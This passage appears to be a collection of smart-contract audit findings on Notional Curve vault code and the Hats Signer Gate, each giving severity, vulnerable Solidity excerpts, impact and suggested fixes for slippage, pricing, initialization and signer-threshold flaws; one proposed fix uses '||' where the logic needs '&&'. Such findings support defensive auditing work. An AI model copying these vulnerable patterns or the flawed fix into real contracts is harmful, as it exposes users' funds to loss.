10^6)\\n\\nsecondaryAmountInPrimary = secondaryBalance * strategyContext.poolClaimPrecision / oraclePrice;\\nsecondaryAmountInPrimary = (50 * 10^6) * 10^18 / (1 * 10^18)\\nsecondaryAmountInPrimary = (50 * 10^6) * 10^18 / (1 * 10^18)\\nsecondaryAmountInPrimary = 50 * 10^6\\n\\nprimaryAmount = primaryBalance + secondaryAmountInPrimary\\nprimaryAmount = (50 * 10^6) + (50 * 10^6) = (100 * 10^6) = 100 USDC\\n```\\n\\n`strategyContext.poolClaimPrecision` set to `CurveConstants.CURVE_PRECISION`, which is `1e18`. `oraclePrice` is always in `1e18` precision.
A vault supporting tokens with two different decimals will undervalue or overvalue the LP Pool tokens.\\nThe affected `TwoTokenPoolUtils._getTimeWeightedPrimaryBalance` function is called within the `Curve2TokenPoolUtils._convertStrategyToUnderlying` function that is used for valuing strategy tokens in terms of the primary balance. As a result, the strategy tokens will be overvalued or undervalued\\nFollowing are some of the impacts of this issue:\\nIf the strategy tokens are overvalued or undervalued, the users might be liquidated prematurely or be able to borrow more than they are allowed to since the `Curve2TokenPoolUtils._convertStrategyToUnderlying` function is indirectly used for computing the collateral ratio of an account within Notional's `VaultConfiguration.calculateCollateralRatio` function.\\n`expectedUnderlyingRedeemed` is computed based on the `Curve2TokenPoolUtils._convertStrategyToUnderlying` function. If the `expectedUnderlyingRedeemed` is incorrect, it will break the vault settlement process.
```\\nFile: TwoTokenPoolUtils.sol\\n function _getTimeWeightedPrimaryBalance(\\n TwoTokenPoolContext memory poolContext,\\n StrategyContext memory strategyContext,\\n uint256 poolClaim,\\n uint256 oraclePrice,\\n uint256 spotPrice\\n ) internal view returns (uint256 primaryAmount) {\\n // Make sure spot price is within oracleDeviationLimit of pairPrice\\n strategyContext._checkPriceLimit(oraclePrice, spotPrice);\\n \\n // Get shares of primary and secondary balances with the provided poolClaim\\n uint256 totalSupply = poolContext.poolToken.totalSupply();\\n uint256 primaryBalance = poolContext.primaryBalance * poolClaim / totalSupply;\\n uint256 secondaryBalance = poolContext.secondaryBalance * poolClaim / totalSupply;\\n\\n // Value the secondary balance in terms of the primary token using the oraclePairPrice\\n uint256 secondaryAmountInPrimary = secondaryBalance * strategyContext.poolClaimPrecision / oraclePrice;\\n\\n // Make sure primaryAmount is reported in primaryPrecision\\n uint256 primaryPrecision = 10 ** poolContext.primaryDecimals;\\n primaryAmount = (primaryBalance + secondaryAmountInPrimary) * primaryPrecision / strategyContext.poolClaimPrecision;\\n }\\n```\\n
`oracleSlippagePercentOrLimit` can exceed the `Constants.SLIPPAGE_LIMIT_PRECISION`
medium
Trade might be settled with a large slippage causing a loss of assets as the `oracleSlippagePercentOrLimit` limit is not bounded and can exceed the `Constants.SLIPPAGE_LIMIT_PRECISION` threshold.\\nThe code at Line 73-75 only checks if the `oracleSlippagePercentOrLimit` is within the `Constants.SLIPPAGE_LIMIT_PRECISION` if `useDynamicSlippage` is `true`. If the trade is performed without dynamic slippage, the trade can be executed with an arbitrary limit.\\n```\\nFile: StrategyUtils.sol\\n function _executeTradeExactIn(\\n TradeParams memory params,\\n ITradingModule tradingModule,\\n address sellToken,\\n address buyToken,\\n uint256 amount,\\n bool useDynamicSlippage\\n ) internal returns (uint256 amountSold, uint256 amountBought) {\\n require(\\n params.tradeType == TradeType.EXACT_IN_SINGLE || params.tradeType == TradeType.EXACT_IN_BATCH\\n );\\n if (useDynamicSlippage) {\\n require(params.oracleSlippagePercentOrLimit <= Constants.SLIPPAGE_LIMIT_PRECISION);\\n }\\n\\n // Sell residual secondary balance\\n Trade memory trade = Trade(\\n params.tradeType,\\n sellToken,\\n buyToken,\\n amount,\\n useDynamicSlippage ? 0 : params.oracleSlippagePercentOrLimit,\\n block.timestamp, // deadline\\n params.exchangeData\\n );\\n```\\n\\nThe `StrategyUtils._executeTradeExactIn` function is utilized by the Curve Vault.
Consider restricting the slippage limit when a trade is executed without dynamic slippage.\\n```\\n function _executeTradeExactIn(\\n TradeParams memory params,\\n ITradingModule tradingModule,\\n address sellToken,\\n address buyToken,\\n uint256 amount,\\n bool useDynamicSlippage\\n ) internal returns (uint256 amountSold, uint256 amountBought) {\\n require(\\n params.tradeType == TradeType.EXACT_IN_SINGLE || params.tradeType == TradeType.EXACT_IN_BATCH\\n );\\n if (useDynamicSlippage) {\\n require(params.oracleSlippagePercentOrLimit <= Constants.SLIPPAGE_LIMIT_PRECISION);\\n// Remove the line below\\n }\\n// Add the line below\\n } else {\\n// Add the line below\\n require(params.oracleSlippagePercentOrLimit != 0 && params.oracleSlippagePercentOrLimit <= Constants.SLIPPAGE_LIMIT_PRECISION_FOR_NON_DYNAMIC_TRADE);\\n// Add the line below\\n } \\n```\\n
Trade might be settled with a large slippage causing a loss of assets.
```\\nFile: StrategyUtils.sol\\n function _executeTradeExactIn(\\n TradeParams memory params,\\n ITradingModule tradingModule,\\n address sellToken,\\n address buyToken,\\n uint256 amount,\\n bool useDynamicSlippage\\n ) internal returns (uint256 amountSold, uint256 amountBought) {\\n require(\\n params.tradeType == TradeType.EXACT_IN_SINGLE || params.tradeType == TradeType.EXACT_IN_BATCH\\n );\\n if (useDynamicSlippage) {\\n require(params.oracleSlippagePercentOrLimit <= Constants.SLIPPAGE_LIMIT_PRECISION);\\n }\\n\\n // Sell residual secondary balance\\n Trade memory trade = Trade(\\n params.tradeType,\\n sellToken,\\n buyToken,\\n amount,\\n useDynamicSlippage ? 0 : params.oracleSlippagePercentOrLimit,\\n block.timestamp, // deadline\\n params.exchangeData\\n );\\n```\\n
Oracle slippage rate is used for checking primary and secondary ratio
medium
The oracle slippage rate (oraclePriceDeviationLimitPercent) is used for checking the ratio of the primary and secondary tokens to be deposited into the pool.\\nAs a result, changing the `oraclePriceDeviationLimitPercent` setting to increase or decrease the allowable slippage between the spot and oracle prices can cause unexpected side-effects to the `_checkPrimarySecondaryRatio` function, which might break the `reinvestReward` function that relies on the `_checkPrimarySecondaryRatio` function under certain condition.\\nThe `_checkPriceLimit` function is for the purpose of comparing the spot price with the oracle price. Thus, the slippage (oraclePriceDeviationLimitPercent) is specially selected for this purpose.\\n```\\nFile: StrategyUtils.sol\\n function _checkPriceLimit(\\n StrategyContext memory strategyContext,\\n uint256 oraclePrice,\\n uint256 poolPrice\\n ) internal pure {\\n uint256 lowerLimit = (oraclePrice * \\n (VaultConstants.VAULT_PERCENT_BASIS - strategyContext.vaultSettings.oraclePriceDeviationLimitPercent)) / \\n VaultConstants.VAULT_PERCENT_BASIS;\\n uint256 upperLimit = (oraclePrice * \\n (VaultConstants.VAULT_PERCENT_BASIS + strategyContext.vaultSettings.oraclePriceDeviationLimitPercent)) / \\n VaultConstants.VAULT_PERCENT_BASIS;\\n\\n if (poolPrice < lowerLimit || upperLimit < poolPrice) {\\n revert Errors.InvalidPrice(oraclePrice, poolPrice);\\n }\\n }\\n```\\n\\nHowever, it was observed that `_checkPriceLimit` function is repurposed for checking if the ratio of the primary and secondary tokens to be deposited to the pool is more or less proportional to the pool's balances within the `_checkPrimarySecondaryRatio` function during reinvestment.\\nThe `oraclePriceDeviationLimitPercent` setting should not be used here as it does not involve any oracle data. Thus, the correct way is to define another setting specifically for checking if the ratio of the primary and secondary tokens to be deposited to the pool is more or less proportional to the pool's balances.\\n```\\nFile: Curve2TokenPoolUtils.sol\\n function _checkPrimarySecondaryRatio(\\n StrategyContext memory strategyContext,\\n uint256 primaryAmount, \\n uint256 secondaryAmount, \\n uint256 primaryPoolBalance, \\n uint256 secondaryPoolBalance\\n ) private pure {\\n uint256 totalAmount = primaryAmount + secondaryAmount;\\n uint256 totalPoolBalance = primaryPoolBalance + secondaryPoolBalance;\\n\\n uint256 primaryPercentage = primaryAmount * CurveConstants.CURVE_PRECISION / totalAmount; \\n uint256 expectedPrimaryPercentage = primaryPoolBalance * CurveConstants.CURVE_PRECISION / totalPoolBalance;\\n\\n strategyContext._checkPriceLimit(expectedPrimaryPercentage, primaryPercentage);\\n\\n uint256 secondaryPercentage = secondaryAmount * CurveConstants.CURVE_PRECISION / totalAmount;\\n uint256 expectedSecondaryPercentage = secondaryPoolBalance * CurveConstants.CURVE_PRECISION / totalPoolBalance;\\n\\n strategyContext._checkPriceLimit(expectedSecondaryPercentage, secondaryPercentage);\\n }\\n```\\n
There is a difference between the slippage for the following two items:\\nAllowable slippage between the spot price and oracle price\\nAllowable slippage between the ratio of the primary and secondary tokens to be deposited to the pool against the pool's balances\\nSince they serve a different purposes, they should not share the same slippage. Consider defining a separate slippage setting and function for checking if the ratio of the primary and secondary tokens deposited to the pool is more or less proportional to the pool's balances.
Changing the `oraclePriceDeviationLimitPercent` setting to increase or decrease the allowable slippage between the spot price and oracle price can cause unexpected side-effects to the `_checkPrimarySecondaryRatio` function, which might break the `reinvestReward` function that relies on the `_checkPrimarySecondaryRatio` function under certain condition.\\nAdditionally, the value chosen for the `oraclePriceDeviationLimitPercent` is to compare the spot price with the oracle price. Thus, it might not be the optimal value for checking if the ratio of the primary and secondary tokens deposited to the pool is more or less proportional to the pool's balances.
```\\nFile: StrategyUtils.sol\\n function _checkPriceLimit(\\n StrategyContext memory strategyContext,\\n uint256 oraclePrice,\\n uint256 poolPrice\\n ) internal pure {\\n uint256 lowerLimit = (oraclePrice * \\n (VaultConstants.VAULT_PERCENT_BASIS - strategyContext.vaultSettings.oraclePriceDeviationLimitPercent)) / \\n VaultConstants.VAULT_PERCENT_BASIS;\\n uint256 upperLimit = (oraclePrice * \\n (VaultConstants.VAULT_PERCENT_BASIS + strategyContext.vaultSettings.oraclePriceDeviationLimitPercent)) / \\n VaultConstants.VAULT_PERCENT_BASIS;\\n\\n if (poolPrice < lowerLimit || upperLimit < poolPrice) {\\n revert Errors.InvalidPrice(oraclePrice, poolPrice);\\n }\\n }\\n```\\n
Logic Error due to different representation of Native ETH (0x0 & 0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE)
medium
Unexpected results might occur during vault initialization if either of the pool's tokens is a Native ETH due to the confusion between `Deployments.ETH_ADDRESS (address(0))` and `Deployments.ALT_ETH_ADDRESS (0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE)`.\\nThe `PRIMARY_TOKEN` or `SECONDARY_TOKEN` is explicitly converted to `Deployments.ETH_ADDRESS (address(0)` during deployment.\\n```\\nFile: Curve2TokenPoolMixin.sol\\nabstract contract Curve2TokenPoolMixin is CurvePoolMixin {\\n..SNIP..\\n constructor(\\n NotionalProxy notional_,\\n ConvexVaultDeploymentParams memory params\\n ) CurvePoolMixin(notional_, params) {\\n address primaryToken = _getNotionalUnderlyingToken(params.baseParams.primaryBorrowCurrencyId);\\n\\n PRIMARY_TOKEN = primaryToken;\\n\\n // Curve uses ALT_ETH_ADDRESS\\n if (primaryToken == Deployments.ETH_ADDRESS) {\\n primaryToken = Deployments.ALT_ETH_ADDRESS;\\n }\\n\\n address token0 = CURVE_POOL.coins(0);\\n address token1 = CURVE_POOL.coins(1);\\n \\n uint8 primaryIndex;\\n address secondaryToken;\\n if (token0 == primaryToken) {\\n primaryIndex = 0;\\n secondaryToken = token1;\\n } else {\\n primaryIndex = 1;\\n secondaryToken = token0;\\n }\\n\\n if (secondaryToken == Deployments.ALT_ETH_ADDRESS) {\\n secondaryToken = Deployments.ETH_ADDRESS;\\n }\\n\\n PRIMARY_INDEX = primaryIndex;\\n SECONDARY_TOKEN = secondaryToken;\\n```\\n\\nIt was observed that there is a logic error within the `Curve2TokenConvexVault.initialize` function. Based on Lines 56 and 59 within the `Curve2TokenConvexVault.initialize` function, it assumes that if either the primary or secondary token is ETH, then the `PRIMARY_TOKEN` or `SECONDARY_TOKEN` will be set to `Deployments.ALT_ETH_ADDRESS`, which point to `0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE`.\\nHowever, this is incorrect as the `PRIMARY_TOKEN` or `SECONDARY_TOKEN` has already been converted to `Deployments.ETH_ADDRESS (address(0))` during deployment. Refer to the constructor of `Curve2TokenPoolMixin`.\\nThus, the `PRIMARY_TOKEN` or `SECONDARY_TOKEN` will never be equal to `Deployments.ALT_ETH_ADDRESS`, and the condition at Lines 56 and 59 will always evaluate to True.\\n```\\nFile: Curve2TokenConvexVault.sol\\ncontract Curve2TokenConvexVault is Curve2TokenVaultMixin {\\n..SNIP..\\n function initialize(InitParams calldata params)\\n external\\n initializer\\n onlyNotionalOwner\\n {\\n __INIT_VAULT(params.name, params.borrowCurrencyId);\\n CurveVaultStorage.setStrategyVaultSettings(params.settings);\\n\\n if (PRIMARY_TOKEN != Deployments.ALT_ETH_ADDRESS) {\\n IERC20(PRIMARY_TOKEN).checkApprove(address(CURVE_POOL), type(uint256).max);\\n }\\n if (SECONDARY_TOKEN != Deployments.ALT_ETH_ADDRESS) {\\n IERC20(SECONDARY_TOKEN).checkApprove(address(CURVE_POOL), type(uint256).max);\\n }\\n\\n CURVE_POOL_TOKEN.checkApprove(address(CONVEX_BOOSTER), type(uint256).max);\\n }\\n```\\n\\nAs a result, if the `PRIMARY_TOKEN` or `SECONDARY_TOKEN` is `Deployments.ETH_ADDRESS (address(0))`, the code will go ahead to call the `checkApprove` function, which might cause unexpected results during vault initialization.
If the `PRIMARY_TOKEN` or `SECONDARY_TOKEN` is equal to `Deployments.ALT_ETH_ADDRESS` or `Deployments.ETH_ADDRESS`, this means that it points to native ETH and the `checkApprove` can be safely skipped.\\n```\\nfunction initialize(InitParams calldata params)\\n external\\n initializer\\n onlyNotionalOwner\\n{\\n __INIT_VAULT(params.name, params.borrowCurrencyId);\\n CurveVaultStorage.setStrategyVaultSettings(params.settings);\\n\\n// Remove the line below\\n if (PRIMARY_TOKEN != Deployments.ALT_ETH_ADDRESS) {\\n// Add the line below\\n if (PRIMARY_TOKEN != Deployments.ALT_ETH_ADDRESS || PRIMARY_TOKEN != Deployments.ETH_ADDRESS) {\\n IERC20(PRIMARY_TOKEN).checkApprove(address(CURVE_POOL), type(uint256).max);\\n }\\n// Remove the line below\\n if (SECONDARY_TOKEN != Deployments.ALT_ETH_ADDRESS) {\\n// Add the line below\\n if (SECONDARY_TOKEN != Deployments.ALT_ETH_ADDRESS || SECONDARY_TOKEN != Deployments.ETH_ADDRESS) {\\n IERC20(SECONDARY_TOKEN).checkApprove(address(CURVE_POOL), type(uint256).max);\\n }\\n\\n CURVE_POOL_TOKEN.checkApprove(address(CONVEX_BOOSTER), type(uint256).max);\\n}\\n```\\n
Unexpected results during vault initialization if either of the pool's tokens is a Native ETH.
```\\nFile: Curve2TokenPoolMixin.sol\\nabstract contract Curve2TokenPoolMixin is CurvePoolMixin {\\n..SNIP..\\n constructor(\\n NotionalProxy notional_,\\n ConvexVaultDeploymentParams memory params\\n ) CurvePoolMixin(notional_, params) {\\n address primaryToken = _getNotionalUnderlyingToken(params.baseParams.primaryBorrowCurrencyId);\\n\\n PRIMARY_TOKEN = primaryToken;\\n\\n // Curve uses ALT_ETH_ADDRESS\\n if (primaryToken == Deployments.ETH_ADDRESS) {\\n primaryToken = Deployments.ALT_ETH_ADDRESS;\\n }\\n\\n address token0 = CURVE_POOL.coins(0);\\n address token1 = CURVE_POOL.coins(1);\\n \\n uint8 primaryIndex;\\n address secondaryToken;\\n if (token0 == primaryToken) {\\n primaryIndex = 0;\\n secondaryToken = token1;\\n } else {\\n primaryIndex = 1;\\n secondaryToken = token0;\\n }\\n\\n if (secondaryToken == Deployments.ALT_ETH_ADDRESS) {\\n secondaryToken = Deployments.ETH_ADDRESS;\\n }\\n\\n PRIMARY_INDEX = primaryIndex;\\n SECONDARY_TOKEN = secondaryToken;\\n```\\n
Ineffective slippage mechanism when redeeming proportionally
high
A trade will continue to be executed regardless of how bad the slippage is since the minimum amount returned by the `TwoTokenPoolUtils._getMinExitAmounts` function does not work effectively. Thus, a trade might incur significant slippage, resulting in the vault receiving fewer tokens in return, leading to losses for the vault shareholders.\\nThe `params.minPrimary` and `params.minSecondary` are calculated automatically based on the share of the Curve pool with a small discount within the `Curve2TokenConvexHelper._executeSettlement` function (Refer to Line 124 below)\\n```\\nFile: Curve2TokenConvexHelper.sol\\n function _executeSettlement(\\n StrategyContext calldata strategyContext,\\n Curve2TokenPoolContext calldata poolContext,\\n uint256 maturity,\\n uint256 poolClaimToSettle,\\n uint256 redeemStrategyTokenAmount,\\n RedeemParams memory params\\n ) private {\\n (uint256 spotPrice, uint256 oraclePrice) = poolContext._getSpotPriceAndOraclePrice(strategyContext);\\n\\n /// @notice params.minPrimary and params.minSecondary are not required to be passed in by the caller\\n /// for this strategy vault\\n (params.minPrimary, params.minSecondary) = poolContext.basePool._getMinExitAmounts({\\n strategyContext: strategyContext,\\n oraclePrice: oraclePrice,\\n spotPrice: spotPrice,\\n poolClaim: poolClaimToSettle\\n });\\n```\\n\\n```\\nFile: TwoTokenPoolUtils.sol\\n /// @notice calculates the expected primary and secondary amounts based on\\n /// the given spot price and oracle price\\n function _getMinExitAmounts(\\n TwoTokenPoolContext calldata poolContext,\\n StrategyContext calldata strategyContext,\\n uint256 spotPrice,\\n uint256 oraclePrice,\\n uint256 poolClaim\\n ) internal view returns (uint256 minPrimary, uint256 minSecondary) {\\n strategyContext._checkPriceLimit(oraclePrice, spotPrice);\\n\\n // min amounts are calculated based on the share of the Balancer pool with a small discount applied\\n uint256 totalPoolSupply = poolContext.poolToken.totalSupply();\\n minPrimary = (poolContext.primaryBalance * poolClaim * \\n strategyContext.vaultSettings.poolSlippageLimitPercent) / // @audit-info poolSlippageLimitPercent = 9975, # 0.25%\\n (totalPoolSupply * uint256(VaultConstants.VAULT_PERCENT_BASIS)); // @audit-info VAULT_PERCENT_BASIS = 1e4 = 10000\\n minSecondary = (poolContext.secondaryBalance * poolClaim * \\n strategyContext.vaultSettings.poolSlippageLimitPercent) / \\n (totalPoolSupply * uint256(VaultConstants.VAULT_PERCENT_BASIS));\\n }\\n```\\n\\nWhen LP tokens are redeemed proportionally via the Curve Pool's `remove_liquidity` function, the tokens received are based on the share of the Curve pool as the source code.\\n```\\n@external\\n@nonreentrant('lock')\\ndef remove_liquidity(\\n _amount: uint256,\\n _min_amounts: uint256[N_COINS],\\n) -> uint256[N_COINS]:\\n """\\n @notice Withdraw coins from the pool\\n @dev Withdrawal amounts are based on current deposit ratios\\n @param _amount Quantity of LP tokens to burn in the withdrawal\\n @param _min_amounts Minimum amounts of underlying coins to receive\\n @return List of amounts of coins that were withdrawn\\n """\\n amounts: uint256[N_COINS] = self._balances()\\n lp_token: address = self.lp_token\\n total_supply: uint256 = ERC20(lp_token).totalSupply()\\n CurveToken(lp_token).burnFrom(msg.sender, _amount) # dev: insufficient funds\\n\\n for i in range(N_COINS):\\n value: uint256 = amounts[i] * _amount / total_supply\\n assert value >= _min_amounts[i], "Withdrawal resulted in fewer coins than expected"\\n\\n amounts[i] = value\\n if i == 0:\\n raw_call(msg.sender, b"", value=value)\\n else:\\n assert ERC20(self.coins[1]).transfer(msg.sender, value)\\n\\n log RemoveLiquidity(msg.sender, amounts, empty(uint256[N_COINS]), total_supply - _amount)\\n\\n return amounts\\n```\\n\\nAssume a Curve Pool with the following state:\\nConsists of 200 US Dollars worth of tokens (100 DAI and 100 USDC). DAI is the primary token\\nDAI <> USDC price is 1:1\\nTotal Supply = 100 LP Pool Tokens\\nAssume that 50 LP Pool Tokens will be claimed during vault settlement.\\n`TwoTokenPoolUtils._getMinExitAmounts` function will return `49.875 DAI` as `params.minPrimary` and `49.875 USDC` as `params.minSecondary` based on the following calculation\\n```\\nminPrimary = (poolContext.primaryBalance * poolClaim * strategyContext.vaultSettings.poolSlippageLimitPercent / (totalPoolSupply * uint256(VaultConstants.VAULT_PERCENT_BASIS)\\nminPrimary = (100 DAI * 50 LP_TOKEN * 99.75% / (100 LP_TOKEN * 100%)\\n\\nRewrite for clarity (ignoring rounding error):\\nminPrimary = 100 DAI * (50 LP_TOKEN/100 LP_TOKEN) * (99.75%/100%) = 49.875 DAI\\n\\nminSecondary = same calculation = 49.875 USDC\\n```\\n\\nCurve Pool's `remove_liquidity` function will return `50 DAI` and `50 USDC` if 50 LP Pool Tokens are redeemed.\\nNote that `TwoTokenPoolUtils._getMinExitAmounts` function performs the calculation based on the spot balance of the pool similar to the approach of the Curve Pool's `remove_liquidity` function. However, the `TwoTokenPoolUtils._getMinExitAmounts` function applied a discount to the returned result, while the Curve Pool's `remove_liquidity` function did not.\\nAs such, the number of tokens returned by Curve Pool's `remove_liquidity` function will always be larger than the number of tokens returned by the `TwoTokenPoolUtils._getMinExitAmounts` function regardless of the on-chain economic condition or the pool state (e.g. imbalance). Thus, the minimum amounts (minAmounts) pass into the Curve Pool's `remove_liquidity` function will never be triggered under any circumstance.\\n```\\na = Curve Pool's remove_liquidity => x DAI\\nb = TwoTokenPoolUtils._getMinExitAmounts => (x DAI - 0.25% discount)\\na > b => true (for all instances)\\n```\\n\\nThus, the `TwoTokenPoolUtils._getMinExitAmounts` function is not effective in determining the slippage when redeeming proportionally.
When redeeming proportional, theTwoTokenPoolUtils._getMinExitAmounts function can be removed. Instead, give the caller the flexibility to define the slippage/minimum amount (params.minPrimary and params.minSecondary). To prevent the caller from setting a slippage that is too large, consider restricting the slippage to an acceptable range.\\nThe proper way of computing the minimum amount of tokens to receive from a proportional trade (remove_liquidity) is to call the Curve's Pool `calc_token_amount` function off-chain and reduce the values returned by the allowed slippage amount.\\nNote that `calc_token_amount` cannot be used solely on-chain for computing the minimum amount because the result can be manipulated because it uses spot balances for computation.\\nSidenote: Removing `TwoTokenPoolUtils._getMinExitAmounts` function also removes the built-in spot price and oracle price validation. Thus, the caller must remember to define the slippage. Otherwise, the vault settlement will risk being sandwiched. Alternatively, shift the `strategyContext._checkPriceLimit(oraclePrice, spotPrice)` code outside the `TwoTokenPoolUtils._getMinExitAmounts` function.
A trade will always be executed even if it returns fewer than expected assets since the minimum amount returned by the `TwoTokenPoolUtils._getMinExitAmounts` function does not work effectively. Thus, a trade might incur unexpected slippage, resulting in the vault receiving fewer tokens in return, leading to losses for the vault shareholders.
```\\nFile: Curve2TokenConvexHelper.sol\\n function _executeSettlement(\\n StrategyContext calldata strategyContext,\\n Curve2TokenPoolContext calldata poolContext,\\n uint256 maturity,\\n uint256 poolClaimToSettle,\\n uint256 redeemStrategyTokenAmount,\\n RedeemParams memory params\\n ) private {\\n (uint256 spotPrice, uint256 oraclePrice) = poolContext._getSpotPriceAndOraclePrice(strategyContext);\\n\\n /// @notice params.minPrimary and params.minSecondary are not required to be passed in by the caller\\n /// for this strategy vault\\n (params.minPrimary, params.minSecondary) = poolContext.basePool._getMinExitAmounts({\\n strategyContext: strategyContext,\\n oraclePrice: oraclePrice,\\n spotPrice: spotPrice,\\n poolClaim: poolClaimToSettle\\n });\\n```\\n
Users are forced to use the first pool returned by the Curve Registry
medium
If multiple pools support the exchange, users are forced to use the first pool returned by the Curve Registry. The first pool returned by Curve Registry might not be the most optimal pool to trade with. The first pool might have lesser liquidity, larger slippage, and higher fee than the other pools, resulting in the trade returning lesser assets than expected.\\nWhen performing a trade via the `CurveAdapter._exactInSingle` function, it will call the `CURVE_REGISTRY.find_pool_for_coins` function to find the available pools for exchanging two coins.\\n```\\nFile: CurveAdapter.sol\\n function _exactInSingle(Trade memory trade)\\n internal view returns (address target, bytes memory executionCallData)\\n {\\n address sellToken = _getTokenAddress(trade.sellToken);\\n address buyToken = _getTokenAddress(trade.buyToken);\\n ICurvePool pool = ICurvePool(Deployments.CURVE_REGISTRY.find_pool_for_coins(sellToken, buyToken));\\n\\n if (address(pool) == address(0)) revert InvalidTrade();\\n\\n int128 i = -1;\\n int128 j = -1;\\n for (int128 c = 0; c < MAX_TOKENS; c++) {\\n address coin = pool.coins(uint256(int256(c)));\\n if (coin == sellToken) i = c;\\n if (coin == buyToken) j = c;\\n if (i > -1 && j > -1) break;\\n }\\n\\n if (i == -1 || j == -1) revert InvalidTrade();\\n\\n return (\\n address(pool),\\n abi.encodeWithSelector(\\n ICurvePool.exchange.selector,\\n i,\\n j,\\n trade.amount,\\n trade.limit\\n )\\n );\\n }\\n```\\n\\nHowever, it was observed that when multiple pools are available, users can choose the pool to return by defining the `i` parameter of the `find_pool_for_coins` function as shown below.\\n```\\n@view\\n@external\\ndef find_pool_for_coins(_from: address, _to: address, i: uint256 = 0) -> address:\\n """\\n @notice Find an available pool for exchanging two coins\\n @param _from Address of coin to be sent\\n @param _to Address of coin to be received\\n @param i Index value. When multiple pools are available\\n this value is used to return the n'th address.\\n @return Pool address\\n """\\n key: uint256 = bitwise_xor(convert(_from, uint256), convert(_to, uint256))\\n return self.markets[key][i]\\n```\\n\\nHowever, the `CurveAdapter._exactInSingle` did not allow users to define the `i` parameter of the `find_pool_for_coins` function. As a result, users are forced to trade against the first pool returned by the Curve Registry.
If multiple pools support the exchange, consider allowing the users to choose which pool they want to trade against.\\n```\\nfunction _exactInSingle(Trade memory trade)\\n internal view returns (address target, bytes memory executionCallData)\\n{\\n address sellToken = _getTokenAddress(trade.sellToken);\\n address buyToken = _getTokenAddress(trade.buyToken);\\n// Remove the line below\\n ICurvePool pool = ICurvePool(Deployments.CURVE_REGISTRY.find_pool_for_coins(sellToken, buyToken));\\n// Add the line below\\n ICurvePool pool = ICurvePool(Deployments.CURVE_REGISTRY.find_pool_for_coins(sellToken, buyToken, trade.pool_index)); \\n```\\n
The first pool returned by Curve Registry might not be the most optimal pool to trade with. The first pool might have lesser liquidity, larger slippage, and higher fee than the other pools, resulting in the trade returning lesser assets than expected.
```\\nFile: CurveAdapter.sol\\n function _exactInSingle(Trade memory trade)\\n internal view returns (address target, bytes memory executionCallData)\\n {\\n address sellToken = _getTokenAddress(trade.sellToken);\\n address buyToken = _getTokenAddress(trade.buyToken);\\n ICurvePool pool = ICurvePool(Deployments.CURVE_REGISTRY.find_pool_for_coins(sellToken, buyToken));\\n\\n if (address(pool) == address(0)) revert InvalidTrade();\\n\\n int128 i = -1;\\n int128 j = -1;\\n for (int128 c = 0; c < MAX_TOKENS; c++) {\\n address coin = pool.coins(uint256(int256(c)));\\n if (coin == sellToken) i = c;\\n if (coin == buyToken) j = c;\\n if (i > -1 && j > -1) break;\\n }\\n\\n if (i == -1 || j == -1) revert InvalidTrade();\\n\\n return (\\n address(pool),\\n abi.encodeWithSelector(\\n ICurvePool.exchange.selector,\\n i,\\n j,\\n trade.amount,\\n trade.limit\\n )\\n );\\n }\\n```\\n
Signers can bypass checks and change threshold within a transaction
high
The `checkAfterExecution()` function has checks to ensure that the safe's threshold isn't changed by a transaction executed by signers. However, the parameters used by the check can be changed midflight so that this crucial restriction is violated.\\nThe `checkAfterExecution()` is intended to uphold important invariants after each signer transaction is completed. This is intended to restrict certain dangerous signer behaviors. From the docs:\\n/// @notice Post-flight check to prevent `safe` signers from removing this contract guard, changing any modules, or changing the threshold\\nHowever, the restriction that the signers cannot change the threshold can be violated.\\nTo see how this is possible, let's check how this invariant is upheld. The following check is performed within the function:\\n```\\nif (safe.getThreshold() != _getCorrectThreshold()) {\\n revert SignersCannotChangeThreshold();\\n}\\n```\\n\\nIf we look up `_getCorrectThreshold()`, we see the following:\\n```\\nfunction _getCorrectThreshold() internal view returns (uint256 _threshold) {\\n uint256 count = _countValidSigners(safe.getOwners());\\n uint256 min = minThreshold;\\n uint256 max = targetThreshold;\\n if (count < min) _threshold = min;\\n else if (count > max) _threshold = max;\\n else _threshold = count;\\n}\\n```\\n\\nAs we can see, this means that the safe's threshold after the transaction must equal the valid signers, bounded by the `minThreshold` and `maxThreshold`.\\nHowever, this check does not ensure that the value returned by `_getCorrectThreshold()` is the same before and after the transaction. As a result, as long as the number of owners is also changed in the transaction, the condition can be upheld.\\nTo illustrate, let's look at an example:\\nBefore the transaction, there are 8 owners on the vault, all signers. targetThreshold == 10 and minThreshold == 2, so the safe's threshold is 8 and everything is good.\\nThe transaction calls `removeOwner()`, removing an owner from the safe and adjusting the threshold down to 7.\\nAfter the transaction, there will be 7 owners on the vault, all signers, the safe's threshold will be 7, and the check will pass.\\nThis simple example focuses on using `removeOwner()` once to decrease the threshold. However, it is also possible to use the safe's multicall functionality to call `removeOwner()` multiple times, changing the threshold more dramatically.
Save the safe's current threshold in `checkTransaction()` before the transaction has executed, and compare the value after the transaction to that value from storage.
Signers can change the threshold of the vault, giving themselves increased control over future transactions and breaking an important trust assumption of the protocol.
```\\nif (safe.getThreshold() != _getCorrectThreshold()) {\\n revert SignersCannotChangeThreshold();\\n}\\n```\\n
HatsSignerGate + MultiHatsSignerGate: more than maxSignatures can be claimed which leads to DOS in reconcileSignerCount
high
The `HatsSignerGate.claimSigner` and `MultiHatsSignerGate.claimSigner` functions allow users to become signers.\\nIt is important that both functions do not allow that there exist more valid signers than `maxSigners`.\\nThis is because if there are more valid signers than `maxSigners`, any call to `HatsSignerGateBase.reconcileSignerCount` reverts, which means that no transactions can be executed.\\nThe only possibility to resolve this is for a valid signer to give up his signer hat. No signer will voluntarily give up his signer hat. And it is wrong that a signer must give it up. Valid signers that have claimed before `maxSigners` was reached should not be affected by someone trying to become a signer and exceeding `maxSigners`. In other words the situation where one of the signers needs to give up his signer hat should have never occurred in the first place.\\nThink of the following scenario:\\n`maxSignatures=10` and there are 10 valid signers\\nThe signers execute a transaction that calls `Safe.addOwnerWithThreshold` such that there are now 11 owners (still there are 10 valid signers)\\nOne of the 10 signers is no longer a wearer of the hat and `reconcileSignerCount` is called. So there are now 9 valid signers and 11 owners\\nThe signer that was no longer a wearer of the hat in the previous step now wears the hat again. However `reconcileSignerCount` is not called. So there are 11 owners and 10 valid signers. The HSG however still thinks there are 9 valid signers.\\nWhen a new signer now calls `claimSigner`, all checks will pass and he will be swapped for the owner that is not a valid signer:\\n```\\n // 9 >= 10 